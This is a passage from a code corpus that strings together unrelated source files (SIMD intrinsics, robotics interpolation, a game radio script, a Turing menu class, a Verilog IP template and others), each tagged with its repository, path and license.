*resulta = a.Unwrap();
*resultb = b.Unwrap();
*resultc = c.Unwrap();
*resultd = d.Unwrap();
}
} // namespace fallback
#ifdef __x86_64__
namespace sse4 {
SCANN_INLINE float HorizontalSum(Sse4<float> x) {
x += Sse4<float>(_mm_shuffle_ps(*x, *x, 0b11'10'11'10));
x += Sse4<float>(_mm_shuffle_ps(*x, *x, 0b11'10'01'01));
return x.GetLowElement();
}
SCANN_INLINE double HorizontalSum(Sse4<double> x) {
x += Sse4<double>(_mm_shuffle_pd(*x, *x, 0b1'1));
return x.GetLowElement();
}
template <typename FloatT>
SCANN_INLINE void HorizontalSum2X(Sse4<FloatT> a, Sse4<FloatT> b,
FloatT* resulta, FloatT* resultb) {
*resulta = HorizontalSum(a);
*resultb = HorizontalSum(b);
}
template <typename FloatT>
SCANN_INLINE void HorizontalSum4X(Sse4<FloatT> a, Sse4<FloatT> b,
Sse4<FloatT> c, Sse4<FloatT> d,
FloatT* resulta, FloatT* resultb,
FloatT* resultc, FloatT* resultd) {
HorizontalSum2X(a, b, resulta, resultb);
HorizontalSum2X(c, d, resultc, resultd);
}
} // namespace sse4
namespace avx1 {
SCANN_AVX1_INLINE float HorizontalSum(Avx1<float> a) {
Sse4<float> upper = _mm256_extractf128_ps(*a, 1);
Sse4<float> lower = _mm256_castps256_ps128(*a);
return sse4::HorizontalSum(upper + lower);
}
SCANN_AVX1_INLINE double HorizontalSum(Avx1<double> a) {
Sse4<double> upper = _mm256_extractf128_pd(*a, 1);
Sse4<double> lower = _mm256_castpd256_pd128(*a);
return sse4::HorizontalSum(upper + lower);
}
template <typename FloatT>
SCANN_AVX1_INLINE Avx1<FloatT> Sum128BitLanes(Avx1<FloatT> a, Avx1<FloatT> b) {
static_assert(IsSameAny<FloatT, float, double>());
constexpr int kDestLoEqALo = 0x00;
constexpr int kDestLoEqAHi = 0x01;
constexpr int kDestHiEqBLo = 0x20;
constexpr int kDestHiEqBHi = 0x30;
Avx1<FloatT> term0, term1;
if constexpr (IsSame<FloatT, float>()) {
term0 = _mm256_permute2f128_ps(*a, *b, kDestLoEqALo + kDestHiEqBLo);
term1 = _mm256_permute2f128_ps(*a, *b, kDestLoEqAHi + kDestHiEqBHi);
}
if constexpr (IsSame<FloatT, double>()) {
term0 = _mm256_permute2f128_pd(*a, *b, kDestLoEqALo + kDestHiEqBLo);
term1 = _mm256_permute2f128_pd(*a, *b, kDestLoEqAHi + kDestHiEqBHi);
}
return term0 + term1;
}
SCANN_AVX1_INLINE Avx1<float> Sum64BitLanes(Avx1<float> a, Avx1<float> b) {
auto term0 = _mm256_shuffle_ps(*a, *b, 0b11'10'01'00);
auto term1 = _mm256_shuffle_ps(*a, *b, 0b01'00'11'10);
return term0 + term1;
}
SCANN_AVX1_INLINE void HorizontalSum2X(Avx1<float> a, Avx1<float> b,
float* resulta, float* resultb) {
auto sum = *Sum128BitLanes(a, b);
sum += _mm256_shuffle_ps(sum, sum, 0b11'10'11'10);
sum += _mm256_shuffle_ps(sum, sum, 0b11'10'01'01);
*resulta = sum[0];
*resultb = sum[4];
}
SCANN_AVX1_INLINE void HorizontalSum3X(Avx1<float> a, Avx1<float> b,
Avx1<float> c, float* resulta,
float* resultb, float* resultc) {
Avx1<float> ac = Sum128BitLanes(a, c);
Avx1<float> bg = b + Avx1<float>(_mm256_permute2f128_ps(*b, *b, 1));
auto abcg = *Sum64BitLanes(ac, bg);
abcg += _mm256_shuffle_ps(abcg, abcg, 0b11'11'01'01);
*resulta = abcg[0];
*resultb = abcg[2];
*resultc = abcg[4];
}
SCANN_AVX1_INLINE void HorizontalSum4X(Avx1<float> a, Avx1<float> b,
Avx1<float> c, Avx1<float> d,
float* resulta, float* resultb,
float* resultc, float* resultd) {
Avx1<float> ac = Sum128BitLanes(a, c);
Avx1<float> bd = Sum128BitLanes(b, d);
auto abcd = *Sum64BitLanes(ac, bd);
abcd += _mm256_shuffle_ps(abcd, abcd, 0b11'11'01'01);
*resulta = abcd[0];
*resultb = abcd[2];
*resultc = abcd[4];
*resultd = abcd[6];
}
SCANN_AVX1_INLINE void HorizontalSum2X(Avx1<double> a, Avx1<double> b,
double* resulta, double* resultb) {
auto sum = *Sum128BitLanes(a, b);
sum += _mm256_shuffle_pd(sum, sum, 0b11'11);
*resulta = sum[0];
*resultb = sum[2];
}
SCANN_AVX1_INLINE void HorizontalSum4X(Avx1<double> a, Avx1<double> b,
Avx1<double> c, Avx1<double> d,
double* resulta, double* resultb,
double* resultc, double* resultd) {
HorizontalSum2X(a, b, resulta, resultb);
HorizontalSum2X(c, d, resultc, resultd);
}
} // namespace avx1
namespace avx2 {
using ::research_scann::avx1::HorizontalSum;
using ::research_scann::avx1::HorizontalSum2X;
using ::research_scann::avx1::HorizontalSum3X;
using ::research_scann::avx1::HorizontalSum4X;
} // namespace avx2
namespace avx512 {
SCANN_AVX512_INLINE float HorizontalSum(Avx512<float> a) {
return _mm512_reduce_add_ps(*a);
}
SCANN_AVX512_INLINE double HorizontalSum(Avx512<double> a) {
return _mm512_reduce_add_pd(*a);
}
SCANN_AVX512_INLINE void HorizontalSum2X(Avx512<float> a, Avx512<float> b,
float* resulta, float* resultb) {
*resulta = _mm512_reduce_add_ps(*a);
*resultb = _mm512_reduce_add_ps(*b);
}
SCANN_AVX512_INLINE void HorizontalSum2X(Avx512<double> a, Avx512<double> b,
double* resulta, double* resultb) {
*resulta = _mm512_reduce_add_pd(*a);
*resultb = _mm512_reduce_add_pd(*b);
}
SCANN_AVX512_INLINE void HorizontalSum4X(Avx512<float> a, Avx512<float> b,
Avx512<float> c, Avx512<float> d,
float* resulta, float* resultb,
float* resultc, float* resultd) {
*resulta = _mm512_reduce_add_ps(*a);
*resultb = _mm512_reduce_add_ps(*b);
*resultc = _mm512_reduce_add_ps(*c);
*resultd = _mm512_reduce_add_ps(*d);
}
SCANN_AVX512_INLINE void HorizontalSum4X(Avx512<double> a, Avx512<double> b,
Avx512<double> c, Avx512<double> d,
double* resulta, double* resultb,
double* resultc, double* resultd) {
*resulta = _mm512_reduce_add_pd(*a);
*resultb = _mm512_reduce_add_pd(*b);
*resultc = _mm512_reduce_add_pd(*c);
*resultd = _mm512_reduce_add_pd(*d);
}
} // namespace avx512
#endif
} // namespace research_scann
#endif
| C | 4 | xxdreck/google-research | scann/scann/utils/intrinsics/horizontal_sum.h | [
"Apache-2.0"
] |
(defun starts-with (search-in search-for)
"Determine whether `str` starts with `search-for`"
(declare (string search-in)
(string search-for))
(and (<= (length search-for) (length search-in))
(string= search-in search-for :end1 (length search-for))))
| Common Lisp | 4 | xsoheilalizadeh/FrameworkBenchmarks | frameworks/Lisp/woo/helpers/starts-with.lisp | [
"BSD-3-Clause"
] |
// Error for construct signature overloads to differ only by return type
class C {
constructor(x: number) { }
}
class C2<T> {
constructor(x: T, y?: string) { }
}
interface I {
new(x: number, y: string): C;
new(x: number, y: string): C2<number>; // error
}
interface I2<T> {
new (x: T, y: string): C2<number>;
new (x: T, y: string): C; // error
new <T>(x: T, y: string): C2<T>;
new <T>(x: T, y: string): C; // error
}
var a: {
new (x: number, y: string): C2<number>;
new (x: number, y: string): C; // error
}
var b: {
new <T>(x: T, y: string): C2<T>;
new <T>(x: T, y: string): C; // error
} | TypeScript | 4 | nilamjadhav/TypeScript | tests/cases/conformance/types/objectTypeLiteral/constructSignatures/constructSignaturesWithOverloadsThatDifferOnlyByReturnType.ts | [
"Apache-2.0"
] |
/******************************************************************************
* Copyright 2017 The Apollo Authors. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*****************************************************************************/
#include "modules/common/math/linear_interpolation.h"
#include <cmath>
#include "cyber/common/log.h"
#include "modules/common/math/math_utils.h"
namespace apollo {
namespace common {
namespace math {
double slerp(const double a0, const double t0, const double a1, const double t1,
const double t) {
if (std::abs(t1 - t0) <= kMathEpsilon) {
ADEBUG << "input time difference is too small";
return NormalizeAngle(a0);
}
const double a0_n = NormalizeAngle(a0);
const double a1_n = NormalizeAngle(a1);
double d = a1_n - a0_n;
if (d > M_PI) {
d = d - 2 * M_PI;
} else if (d < -M_PI) {
d = d + 2 * M_PI;
}
const double r = (t - t0) / (t1 - t0);
const double a = a0_n + d * r;
return NormalizeAngle(a);
}
SLPoint InterpolateUsingLinearApproximation(const SLPoint &p0,
const SLPoint &p1, const double w) {
CHECK_GE(w, 0.0);
SLPoint p;
p.set_s((1 - w) * p0.s() + w * p1.s());
p.set_l((1 - w) * p0.l() + w * p1.l());
return p;
}
PathPoint InterpolateUsingLinearApproximation(const PathPoint &p0,
const PathPoint &p1,
const double s) {
double s0 = p0.s();
double s1 = p1.s();
PathPoint path_point;
double weight = (s - s0) / (s1 - s0);
double x = (1 - weight) * p0.x() + weight * p1.x();
double y = (1 - weight) * p0.y() + weight * p1.y();
double theta = slerp(p0.theta(), p0.s(), p1.theta(), p1.s(), s);
double kappa = (1 - weight) * p0.kappa() + weight * p1.kappa();
double dkappa = (1 - weight) * p0.dkappa() + weight * p1.dkappa();
double ddkappa = (1 - weight) * p0.ddkappa() + weight * p1.ddkappa();
path_point.set_x(x);
path_point.set_y(y);
path_point.set_theta(theta);
path_point.set_kappa(kappa);
path_point.set_dkappa(dkappa);
path_point.set_ddkappa(ddkappa);
path_point.set_s(s);
return path_point;
}
TrajectoryPoint InterpolateUsingLinearApproximation(const TrajectoryPoint &tp0,
const TrajectoryPoint &tp1,
const double t) {
if (!tp0.has_path_point() || !tp1.has_path_point()) {
TrajectoryPoint p;
p.mutable_path_point()->CopyFrom(PathPoint());
return p;
}
const PathPoint pp0 = tp0.path_point();
const PathPoint pp1 = tp1.path_point();
double t0 = tp0.relative_time();
double t1 = tp1.relative_time();
TrajectoryPoint tp;
tp.set_v(lerp(tp0.v(), t0, tp1.v(), t1, t));
tp.set_a(lerp(tp0.a(), t0, tp1.a(), t1, t));
tp.set_relative_time(t);
tp.set_steer(slerp(tp0.steer(), t0, tp1.steer(), t1, t));
PathPoint *path_point = tp.mutable_path_point();
path_point->set_x(lerp(pp0.x(), t0, pp1.x(), t1, t));
path_point->set_y(lerp(pp0.y(), t0, pp1.y(), t1, t));
path_point->set_theta(slerp(pp0.theta(), t0, pp1.theta(), t1, t));
path_point->set_kappa(lerp(pp0.kappa(), t0, pp1.kappa(), t1, t));
path_point->set_dkappa(lerp(pp0.dkappa(), t0, pp1.dkappa(), t1, t));
path_point->set_ddkappa(lerp(pp0.ddkappa(), t0, pp1.ddkappa(), t1, t));
path_point->set_s(lerp(pp0.s(), t0, pp1.s(), t1, t));
return tp;
}
} // namespace math
} // namespace common
} // namespace apollo
| C++ | 5 | seeclong/apollo | modules/common/math/linear_interpolation.cc | [
"Apache-2.0"
] |
#include "script_component.hpp"
/*
Name: TFAR_fnc_onSpeakVolumeModifierPressed
Author: ACyprus
Transiently changes the volume for the player's voice in game to either Yelling or Whisper
Arguments:
0: Volume level : VALUES ("yelling" or "whispering") <STRING>
Return Value:
Whether or not the event was handled <BOOL>
Example:
["yelling"] call TFAR_fnc_onSpeakVolumeModifierPressed;
Public: No
*/
params ["_modifierMode"];
private _allowedModes = ["yelling", "whispering"];
if(!alive TFAR_currentUnit || TF_tangent_sw_pressed || TF_tangent_lr_pressed) exitWith {false};
if!(_modifierMode in _allowedModes) exitWith {false};
TF_last_speak_volume_level = TF_speak_volume_level;
TF_last_speak_volume_meters = TF_speak_volume_meters;
TF_speak_volume_level = _modifierMode;
if(_modifierMode == "yelling") then {
TF_speak_volume_meters = TF_max_voice_volume;
} else {
TF_speak_volume_meters = TF_min_voice_volume;
};
/* Tell the plugin that we just changed our volume
We can't wait for the normal sendFreqInfo interval because the Plugin has to
know the change before we start transmitting
*/
call TFAR_fnc_sendFrequencyInfo;
private _localName = localize format[LSTRING(voice_%1), _modifierMode];
private _hintText = format[localize LSTRING(voice_volume), _localName];
if (TFAR_oldVolumeHint) then {
if (TFAR_volumeModifier_forceSpeech) then {
[_hintText,format["TANGENT PRESSED %1 %2 %3","directSpeechFreq", 0, "directSpeech"],-1] call TFAR_fnc_processTangent;
} else {
[parseText (_hintText), -1] call TFAR_fnc_showHint;
};
} else {
if (!TFAR_ShowVolumeHUD) then {
(QGVAR(HUDVolumeIndicatorRsc) call BIS_fnc_rscLayer) cutRsc [QGVAR(HUDVolumeIndicatorRsc), "PLAIN", 0, true]; //Hidden in the Released handler
};
if (TFAR_volumeModifier_forceSpeech) then {
["",format["TANGENT PRESSED %1 %2 %3","directSpeechFreq", 0, "directSpeech"],0] call TFAR_fnc_processTangent;
};
};
call TFAR_fnc_updateSpeakVolumeUI;
["OnSpeakVolumeModifierPressed", [TFAR_currentUnit, TF_speak_volume_level, TF_speak_volume_meters]] call TFAR_fnc_fireEventHandlers;
true
| SQF | 5 | MrDj200/task-force-arma-3-radio | addons/core/functions/events/keys/fnc_onSpeakVolumeModifierPressed.sqf | [
"RSA-MD"
] |
package restful
import "strings"
// Copyright 2013 Ernest Micklei. All rights reserved.
// Use of this source code is governed by a license
// that can be found in the LICENSE file.
// OPTIONSFilter is a filter function that inspects the Http Request for the OPTIONS method
// and provides the response with a set of allowed methods for the request URL Path.
// As for any filter, you can also install it for a particular WebService within a Container.
// Note: this filter is not needed when using CrossOriginResourceSharing (for CORS).
func (c *Container) OPTIONSFilter(req *Request, resp *Response, chain *FilterChain) {
if "OPTIONS" != req.Request.Method {
chain.ProcessFilter(req, resp)
return
}
archs := req.Request.Header.Get(HEADER_AccessControlRequestHeaders)
methods := strings.Join(c.computeAllowedMethods(req), ",")
origin := req.Request.Header.Get(HEADER_Origin)
resp.AddHeader(HEADER_Allow, methods)
resp.AddHeader(HEADER_AccessControlAllowOrigin, origin)
resp.AddHeader(HEADER_AccessControlAllowHeaders, archs)
resp.AddHeader(HEADER_AccessControlAllowMethods, methods)
}
// OPTIONSFilter is a filter function that inspects the Http Request for the OPTIONS method
// and provides the response with a set of allowed methods for the request URL Path.
// Note: this filter is not needed when using CrossOriginResourceSharing (for CORS).
func OPTIONSFilter() FilterFunction {
return DefaultContainer.OPTIONSFilter
}
| Go | 4 | pkoushik/ARO-RP | vendor/github.com/emicklei/go-restful/options_filter.go | [
"Apache-2.0"
] |
-- Copyright 2014-2015 The Howl Developers
-- License: MIT (see LICENSE.md at the top-level directory of the distribution)
require 'ljglibs.gio.output_stream'
core = require 'ljglibs.core'
core.define 'GFileOutputStream < GOutputStream', {
}
| MoonScript | 4 | felipetavares/folt-howl | lib/ljglibs/gio/file_output_stream.moon | [
"MIT"
] |
#version 3.6;
#include "colors.inc"
#include "metals.inc"
#include "textures.inc"
camera {
location <0,-50,15>
sky z
right -0.25*x*image_width/image_height
up 0.25*y
look_at <0,0,0>
}
background{rgb 1}
light_source{<-16,-30,30> color rgb <0.77,0.75,0.75>}
light_source{<25,-16,8> color rgb <0.43,0.45,0.45>}
#declare r=0.05;
#declare s=0.5;
#declare particles=union {
#include "irregular_p.pov"
pigment{rgb 0.9} finish{reflection 0.2 specular 0.25 ambient 0.28 metallic}
}
union{particles translate <-4,0,0>}
union{particles translate <4,0,0>}
union{
#include "irregular_v.pov"
translate <4,0,0>
pigment{rgb <0.7,0.3,0.9>} finish{specular 0.5 ambient 0.42}
}
| POV-Ray SDL | 4 | wgq-iapcm/Parvoro- | 3rdparty/voro++-0.4.6/examples/extra/irregular.pov | [
"BSD-3-Clause"
] |
unit
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% MenuBarClass - Class that implements menus in OOT.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% The external interface of MenuBarClass empty. The MenuBarClass should not
% be used directly by external programs.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% The package interface of MenuBarClass is as follows:
% procedure AddMenu (menu, afterMenu : ^MenuClass) - Add a MenuClass object
% to the menu bar. Place
% it after afterMenu.
% procedure AppendMenu (menu : ^MenuClass) - Add a MenuClass object to the
% menu bar after all other menus.
% function ConsiderButtonDown (x, y : int) : boolean
% x, y - The location of of the mouse when the button
% was pressed.
% Handle the mouse button being pressed. If it occured
% in the menu bar, handle the event. Return true if the
% event is handled by this function. Return false
% otherwise. If a menu item was selected, call the
% actionProc for the menu item.
% function ConsiderKeystroke (key : char) : boolean
% key - The key pressed.
% Handle a keystroke. If the keystroke is the
% shortcut for a menu item, the actionProc for the
% menu item is called and the function returns true,
% otherwise it returns false.
% function GetLastMenu : ^MenuClass - Return the last menu added to the menu
% bar.
% function GetSelectedMenuItem : ^WidgetClass - Return the currently
% selected menu item. Used
% by the GUI module to get the
% id of the menu item.
% procedure Hide - Hide the menu bar.
% procedure Show - Display the menu bar.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% The inheritable subprograms of MenuBarClass are as follows:
% procedure AssertFailed (msg : string) - Quit program with error message.
% procedure DrawBar - Draw the menu bar.
% function FindMenu (x : int) : ^MenuClass - Return the menu which is found
% at position (x, maxy) in the
% menu bar.
% procedure Initialize - Initialize the menu bar.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% The inheritable variables of MenuBarClass are as follows:
% initialized - Whether the menu bar has been initialized.
% showing - Whether the menu bar is currently visible.
% menuLine - The y coordinate of the bottom of the menu bar.
% selectedMenu - The currently selected menu.
% firstMenuNode - the first in the linked list of MenuNodes.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
class MenuBarClass
import MenuClass, GenericWidgetClass, WidgetGlobals
export
% The package interface
AddMenu, AppendMenu, ConsiderButtonDown, ConsiderKeystroke,
GetLastMenu, Hide, Show
%
% The inheritable types of MenuBarClass
%
type MenuNode :
record
menu : ^MenuClass
next : ^MenuNode
end record
%
% The inhertiable variables of MenuBarClass
%
var initialized : boolean := false
var showing : boolean := true
var menuLine : int
var selectedMenu : ^MenuClass
var firstMenuNode : ^MenuNode
%
% The inheritable subprograms of MenuBarClass
%
procedure AssertFailed (msg : string)
Window.Select (defWinId)
locate (1, 1)
put msg
assert false
end AssertFailed
procedure DrawBar
var menuNode : ^MenuNode := firstMenuNode
if not initialized or not showing then
return
end if
Draw.Line (0, maxy, maxx, maxy, black)
Draw.FillBox (0, menuLine + 1, maxx, maxy - 1,
WidgetGlobals.MENU_COLOUR)
Draw.Line (0, menuLine, maxx, menuLine, black)
loop
exit when menuNode = nil
menuNode -> menu -> DrawMenuTitle
menuNode := menuNode -> next
end loop
end DrawBar
function FindMenu (x : int) : ^MenuClass
var menuNode : ^MenuNode := firstMenuNode
loop
exit when menuNode = nil
if menuNode -> menu -> InMenu (x) then
result menuNode -> menu
end if
menuNode := menuNode -> next
end loop
result nil
end FindMenu
procedure Initialize
if not initialized then
initialized := true
firstMenuNode := nil
menuLine := maxy - WidgetGlobals.MENU_BAR_HEIGHT
end if
end Initialize
%
% The package subprograms of MenuBarClass
%
procedure AddMenu (menu, afterMenu : ^MenuClass)
var newMenuNode, menuNode : ^MenuNode
var offset : int
Initialize
% Set the menu bar that the menu has been placed in
menu -> SetMenuBarLine (menuLine)
% Create a menu node and place it in the linked list
new newMenuNode
newMenuNode -> menu := menu
if afterMenu = nil then
newMenuNode -> next := firstMenuNode
firstMenuNode := newMenuNode
else
menuNode := firstMenuNode
loop
exit when menuNode = nil or menuNode -> menu = afterMenu
menuNode := menuNode -> next
end loop
if menuNode = nil then
AssertFailed ("Menu ID not found")
end if
newMenuNode -> next := menuNode -> next
menuNode -> next := newMenuNode
end if
% Set the start/end positions
menuNode := firstMenuNode
offset := 0
loop
exit when menuNode = nil
offset := menuNode -> menu -> SetWidth (offset)
menuNode := menuNode -> next
end loop
DrawBar
end AddMenu
procedure AppendMenu (menu : ^MenuClass)
Initialize
if firstMenuNode = nil then
AddMenu (menu, nil)
else
var menuNode : ^MenuNode := firstMenuNode
loop
exit when menuNode -> next = nil
menuNode := menuNode -> next
end loop
AddMenu (menu, menuNode -> menu)
end if
end AppendMenu
function ConsiderButtonDown (mouseX, mouseY : int) : boolean
var mx, my, b : int
var menu : ^MenuClass
if not initialized or not showing or mouseY < menuLine then
result false
end if
selectedMenu := FindMenu (mouseX)
if selectedMenu = nil then
result true
end if
% Hilite the menu
loop
if selectedMenu not= nil then
exit when selectedMenu -> ConsiderButtonDown (0, 0)
end if
Mouse.Where (mx, my, b)
selectedMenu := FindMenu (mx)
exit when b = 0
end loop
result true
end ConsiderButtonDown
function ConsiderKeystroke (key : char) : boolean
var menuNode : ^MenuNode := firstMenuNode
if not initialized or not showing then
result false
end if
% Check each menu for the keystroke
loop
exit when menuNode = nil
selectedMenu := menuNode -> menu
if menuNode -> menu -> ConsiderKeystroke (key) then
result true
end if
menuNode := menuNode -> next
end loop
result false
end ConsiderKeystroke
function GetLastMenu : ^MenuClass
if firstMenuNode = nil then
result nil
else
var menuNode : ^MenuNode := firstMenuNode
loop
exit when menuNode -> next = nil
menuNode := menuNode -> next
end loop
result menuNode -> menu
end if
end GetLastMenu
procedure Hide
showing := false
if initialized then
Draw.FillBox (0, menuLine, maxx, maxy,
WidgetGlobals.backgroundColour)
end if
end Hide
procedure Show
showing := true
DrawBar
end Show
end MenuBarClass
| Turing | 5 | ttracx/OpenTuring | turing/test/support/lib/GUIClass/MenuBarClass.tu | [
"MIT"
] |
package com.baeldung.xmlhtml.pojo.jaxb.html.elements;
import javax.xml.bind.annotation.XmlElement;
public class NestedElement {
private CustomElement customElement;
public CustomElement getCustomElement() {
return customElement;
}
@XmlElement(name = "p")
public void setCustomElement(CustomElement customElement) {
this.customElement = customElement;
}
} | Java | 4 | DBatOWL/tutorials | xml/src/main/java/com/baeldung/xmlhtml/pojo/jaxb/html/elements/NestedElement.java | [
"MIT"
] |
use inner::Trait;
mod inner {
pub struct Foo;
pub trait Trait {
fn f(&self);
fn f_ufcs(&self);
}
impl Trait for Foo {
fn f(&self) { }
fn f_ufcs(&self) { }
}
}
pub trait Outer {
fn foo<T: Trait>(&self, t: T) { t.f(); }
fn foo_ufcs<T: Trait>(&self, t: T) { T::f(&t); }
}
impl Outer for isize {}
pub fn foo<T: Outer>(t: T) {
t.foo(inner::Foo);
}
pub fn foo_ufcs<T: Outer>(t: T) {
T::foo_ufcs(&t, inner::Foo)
}
| Rust | 4 | Eric-Arellano/rust | src/test/ui/issues/auxiliary/issue-11225-2.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
export default function AboutBypass({ message }) {
return (
<div>
<h1 className="title">About Bypassed Page</h1>
<p className={message}>{message}</p>
</div>
)
}
export const getServerSideProps = ({ query }) => ({
props: { message: query.message || '' },
})
| JavaScript | 4 | blomqma/next.js | test/integration/middleware/core/pages/rewrites/about-bypass.js | [
"MIT"
] |
// (c) Copyright 1995-2017 Xilinx, Inc. All rights reserved.
//
// This file contains confidential and proprietary information
// of Xilinx, Inc. and is protected under U.S. and
// international copyright and other intellectual property
// laws.
//
// DISCLAIMER
// This disclaimer is not a license and does not grant any
// rights to the materials distributed herewith. Except as
// otherwise provided in a valid license issued to you by
// Xilinx, and to the maximum extent permitted by applicable
// law: (1) THESE MATERIALS ARE MADE AVAILABLE "AS IS" AND
// WITH ALL FAULTS, AND XILINX HEREBY DISCLAIMS ALL WARRANTIES
// AND CONDITIONS, EXPRESS, IMPLIED, OR STATUTORY, INCLUDING
// BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY, NON-
// INFRINGEMENT, OR FITNESS FOR ANY PARTICULAR PURPOSE; and
// (2) Xilinx shall not be liable (whether in contract or tort,
// including negligence, or under any other theory of
// liability) for any loss or damage of any kind or nature
// related to, arising under or in connection with these
// materials, including for any direct, or any indirect,
// special, incidental, or consequential loss or damage
// (including loss of data, profits, goodwill, or any type of
// loss or damage suffered as a result of any action brought
// by a third party) even if such damage or loss was
// reasonably foreseeable or Xilinx had been advised of the
// possibility of the same.
//
// CRITICAL APPLICATIONS
// Xilinx products are not designed or intended to be fail-
// safe, or for use in any application requiring fail-safe
// performance, such as life-support or safety devices or
// systems, Class III medical devices, nuclear facilities,
// applications related to the deployment of airbags, or any
// other applications that could lead to death, personal
// injury, or severe property or environmental damage
// (individually and collectively, "Critical
// Applications"). Customer assumes the sole risk and
// liability of any use of Xilinx products in Critical
// Applications, subject only to applicable laws and
// regulations governing limitations on product liability.
//
// THIS COPYRIGHT NOTICE AND DISCLAIMER MUST BE RETAINED AS
// PART OF THIS FILE AT ALL TIMES.
//
// DO NOT MODIFY THIS FILE.
// IP VLNV: xilinx.com:ip:ahblite_axi_bridge:3.0
// IP Revision: 10
// The following must be inserted into your Verilog file for this
// core to be instantiated. Change the instance name and port connections
// (in parentheses) to your own signal names.
//----------- Begin Cut here for INSTANTIATION Template ---// INST_TAG
ahblite_axi_bridge_0 your_instance_name (
.s_ahb_hclk(s_ahb_hclk), // input wire s_ahb_hclk
.s_ahb_hresetn(s_ahb_hresetn), // input wire s_ahb_hresetn
.s_ahb_hsel(s_ahb_hsel), // input wire s_ahb_hsel
.s_ahb_haddr(s_ahb_haddr), // input wire [31 : 0] s_ahb_haddr
.s_ahb_hprot(s_ahb_hprot), // input wire [3 : 0] s_ahb_hprot
.s_ahb_htrans(s_ahb_htrans), // input wire [1 : 0] s_ahb_htrans
.s_ahb_hsize(s_ahb_hsize), // input wire [2 : 0] s_ahb_hsize
.s_ahb_hwrite(s_ahb_hwrite), // input wire s_ahb_hwrite
.s_ahb_hburst(s_ahb_hburst), // input wire [2 : 0] s_ahb_hburst
.s_ahb_hwdata(s_ahb_hwdata), // input wire [31 : 0] s_ahb_hwdata
.s_ahb_hready_out(s_ahb_hready_out), // output wire s_ahb_hready_out
.s_ahb_hready_in(s_ahb_hready_in), // input wire s_ahb_hready_in
.s_ahb_hrdata(s_ahb_hrdata), // output wire [31 : 0] s_ahb_hrdata
.s_ahb_hresp(s_ahb_hresp), // output wire s_ahb_hresp
.m_axi_awid(m_axi_awid), // output wire [3 : 0] m_axi_awid
.m_axi_awlen(m_axi_awlen), // output wire [7 : 0] m_axi_awlen
.m_axi_awsize(m_axi_awsize), // output wire [2 : 0] m_axi_awsize
.m_axi_awburst(m_axi_awburst), // output wire [1 : 0] m_axi_awburst
.m_axi_awcache(m_axi_awcache), // output wire [3 : 0] m_axi_awcache
.m_axi_awaddr(m_axi_awaddr), // output wire [31 : 0] m_axi_awaddr
.m_axi_awprot(m_axi_awprot), // output wire [2 : 0] m_axi_awprot
.m_axi_awvalid(m_axi_awvalid), // output wire m_axi_awvalid
.m_axi_awready(m_axi_awready), // input wire m_axi_awready
.m_axi_awlock(m_axi_awlock), // output wire m_axi_awlock
.m_axi_wdata(m_axi_wdata), // output wire [31 : 0] m_axi_wdata
.m_axi_wstrb(m_axi_wstrb), // output wire [3 : 0] m_axi_wstrb
.m_axi_wlast(m_axi_wlast), // output wire m_axi_wlast
.m_axi_wvalid(m_axi_wvalid), // output wire m_axi_wvalid
.m_axi_wready(m_axi_wready), // input wire m_axi_wready
.m_axi_bid(m_axi_bid), // input wire [3 : 0] m_axi_bid
.m_axi_bresp(m_axi_bresp), // input wire [1 : 0] m_axi_bresp
.m_axi_bvalid(m_axi_bvalid), // input wire m_axi_bvalid
.m_axi_bready(m_axi_bready), // output wire m_axi_bready
.m_axi_arid(m_axi_arid), // output wire [3 : 0] m_axi_arid
.m_axi_arlen(m_axi_arlen), // output wire [7 : 0] m_axi_arlen
.m_axi_arsize(m_axi_arsize), // output wire [2 : 0] m_axi_arsize
.m_axi_arburst(m_axi_arburst), // output wire [1 : 0] m_axi_arburst
.m_axi_arprot(m_axi_arprot), // output wire [2 : 0] m_axi_arprot
.m_axi_arcache(m_axi_arcache), // output wire [3 : 0] m_axi_arcache
.m_axi_arvalid(m_axi_arvalid), // output wire m_axi_arvalid
.m_axi_araddr(m_axi_araddr), // output wire [31 : 0] m_axi_araddr
.m_axi_arlock(m_axi_arlock), // output wire m_axi_arlock
.m_axi_arready(m_axi_arready), // input wire m_axi_arready
.m_axi_rid(m_axi_rid), // input wire [3 : 0] m_axi_rid
.m_axi_rdata(m_axi_rdata), // input wire [31 : 0] m_axi_rdata
.m_axi_rresp(m_axi_rresp), // input wire [1 : 0] m_axi_rresp
.m_axi_rvalid(m_axi_rvalid), // input wire m_axi_rvalid
.m_axi_rlast(m_axi_rlast), // input wire m_axi_rlast
.m_axi_rready(m_axi_rready) // output wire m_axi_rready
);
// INST_TAG_END ------ End INSTANTIATION Template ---------
// You must compile the wrapper file ahblite_axi_bridge_0.v when simulating
// the core, ahblite_axi_bridge_0. When compiling the wrapper file, be sure to
// reference the Verilog simulation library.
| Verilog | 3 | mrDrivingDuck/mips32-CPU | soc/rtl/xilinx_ip/ahblite_axi_bridge_0/ahblite_axi_bridge_0.veo | [
"MIT"
] |
DefaultBehavior FlowControl tap = dmacro("takes one or two arguments that represent code. Will yield the receiver and then return the receiver after executing the given code",
[code]
code evaluateOn(call ground, self)
self,
[argName, code]
